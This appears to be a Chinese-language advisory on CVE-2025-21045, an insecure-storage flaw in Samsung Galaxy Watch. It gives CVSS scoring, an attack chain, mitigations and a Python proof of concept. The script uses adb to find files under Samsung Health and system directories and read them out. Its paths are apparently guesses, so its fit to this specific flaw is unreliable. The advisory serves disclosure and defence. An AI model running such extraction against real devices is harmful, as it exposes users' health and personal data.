CVE-2025-21045 三星Galaxy Watch敏感信息不安全存储漏洞

漏洞信息

漏洞编号

CVE-2025-21045

漏洞类型

敏感信息不安全存储（信息泄露）

CVSS评分

4.0 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Samsung Galaxy Watch

漏洞概述

CVE-2025-21045是三星Galaxy Watch智能手表中存在的一个本地敏感信息不安全存储漏洞。该漏洞由三星安全团队（[email protected]）发现并报告，于2025年10月10日正式披露。根据NVD（美国国家漏洞数据库）的记录，该漏洞的CVSS 3.1基础评分为4.0分，属于中危级别漏洞。

该漏洞影响SMR（Samsung Mobile Release）2025年10月安全补丁1之前的Galaxy Watch设备。漏洞的根本原因是设备在存储敏感信息时未采取充分的安全保护措施，导致本地攻击者能够在无需任何认证或用户交互的情况下访问这些敏感数据。

从CVSS向量可以看出，该漏洞的攻击向量为本地（AV:L），攻击复杂度低（AC:L），无需权限（PR:N），无需用户交互（UI:N），其影响范围未发生变化（S:U）。漏洞对机密性影响为低（C:L），对完整性和可用性无影响。这意味着攻击者虽然能够获取部分敏感信息，但无法修改数据或造成服务中断。该漏洞主要威胁用户数据的隐私性，可能导致个人敏感信息被未授权访问。

三星公司已通过SMR Oct-2025 Release 1安全更新修复了该漏洞，建议用户及时更新设备固件以获得保护。

技术细节

该漏洞属于敏感信息不安全存储类漏洞（Insecure Storage of Sensitive Information），是移动设备安全中常见的一类信息泄露问题。

漏洞原理：Galaxy Watch设备在处理和存储敏感信息（如用户健康数据、个人身份信息、加密密钥或其他隐私数据）时，未采用足够的安全存储机制（如硬件级安全区域TEE（Trusted Execution Environment）隔离、StrongBox密钥保护、或适当的文件系统权限控制）。这导致敏感数据以明文或弱保护形式存储在设备可访问的存储区域中。

利用方式：由于该漏洞的攻击向量为本地（AV:L），攻击者需要物理接触目标设备或已获得设备的本地访问权限（例如通过ADB调试接口、恶意应用、或物理提取等方式）。在获得本地访问权限后，攻击者无需任何特殊权限或用户交互即可访问受影响的存储区域，读取存储的敏感信息。

具体利用步骤包括：
1. 获取目标Galaxy Watch设备的本地访问权限；
2. 通过文件系统浏览或调试接口访问存储区域；
3. 读取未受保护的敏感数据文件；
4. 提取并利用获取的敏感信息。

由于该漏洞不影响完整性和可用性，攻击者无法通过此漏洞修改设备数据或造成持久性破坏，但其对用户隐私构成的威胁不容忽视。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者通过物理接触设备、ADB调试接口、或安装恶意应用程序等方式，获得对目标Galaxy Watch设备的本地访问权限。

STEP 2

步骤2：探测存储路径

利用本地访问权限，攻击者浏览设备的文件系统，定位存储敏感信息的目录和文件，如健康数据目录、系统数据目录等。

STEP 3

步骤3：绕过存储保护

由于敏感信息未采用充分的加密或权限保护措施，攻击者无需特殊权限即可读取受影响的文件内容。

STEP 4

步骤4：提取敏感信息

攻击者成功读取并提取存储在设备上的敏感信息，如个人健康数据、身份凭证或其他隐私数据。

STEP 5

步骤5：利用窃取的信息

攻击者利用获取的敏感信息进行身份冒充、隐私侵犯或其他恶意活动，对用户造成潜在的安全威胁。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-21045 PoC - Galaxy Watch Insecure Sensitive Information Storage
# This PoC demonstrates how a local attacker could access sensitive information
# stored insecurely on Samsung Galaxy Watch devices prior to SMR Oct-2025 Release 1.

import subprocess
import os

# Step 1: Check if device is accessible via ADB (local access required)
def check_device_access():
    """Verify local access to the target Galaxy Watch device"""
    result = subprocess.run(['adb', 'devices'], capture_output=True, text=True)
    return 'device' in result.stdout

# Step 2: Attempt to access potentially vulnerable storage paths
# Galaxy Watch may store sensitive data in various locations
vulnerable_paths = [
    '/data/data/com.samsung.health/databases/',   # Samsung Health data
    '/data/data/com.samsung.android.app-watchmanager/',  # Watch Manager data
    '/data/system/users/0/',                      # User system data
    '/data/local/tmp/',                           # Temporary storage
    '/sdcard/Android/data/com.samsung.health/',   # Health data on SD card
]

def enumerate_sensitive_files():
    """Enumerate files in vulnerable storage locations"""
    sensitive_files = []
    for path in vulnerable_paths:
        try:
            # Use adb shell to list files in potentially vulnerable directories
            result = subprocess.run(
                ['adb', 'shell', 'find', path, '-type', 'f'],
                capture_output=True, text=True, timeout=10
            )
            if result.stdout:
                sensitive_files.extend(result.stdout.strip().split('\n'))
        except Exception as e:
            print(f"Error accessing {path}: {e}")
    return sensitive_files

# Step 3: Extract readable content from discovered sensitive files
def extract_sensitive_data(files):
    """Attempt to read content from discovered files"""
    extracted_data = {}
    for filepath in files[:20]:  # Limit to first 20 files for demonstration
        try:
            result = subprocess.run(
                ['adb', 'shell', 'cat', filepath],
                capture_output=True, text=True, timeout=5
            )
            if result.stdout and len(result.stdout) > 0:
                extracted_data[filepath] = result.stdout[:500]  # Truncate output
        except Exception:
            pass
    return extracted_data

# Main execution
if __name__ == "__main__":
    if check_device_access():
        print("[*] Device accessible. Searching for sensitive information...")
        files = enumerate_sensitive_files()
        print(f"[*] Found {len(files)} potentially sensitive files")
        data = extract_sensitive_data(files)
        print(f"[*] Successfully extracted data from {len(data)} files")
        for filepath, content in data.items():
            print(f"\n[+] File: {filepath}")
            print(f"    Content preview: {content[:100]}...")
    else:
        print("[-] No accessible device found. Local access required.")

影响范围

Samsung Galaxy Watch < SMR Oct-2025 Release 1

防御指南

临时缓解措施

在无法立即更新设备固件的情况下，建议用户采取以下临时缓解措施：1）限制设备的物理访问，避免将设备交给不可信的第三方；2）禁用USB调试功能，防止通过ADB进行未授权访问；3）定期清除设备上的敏感数据；4）使用三星Knox等安全功能增强设备保护；5）关注三星安全公告，尽快安装SMR Oct-2025 Release 1安全更新。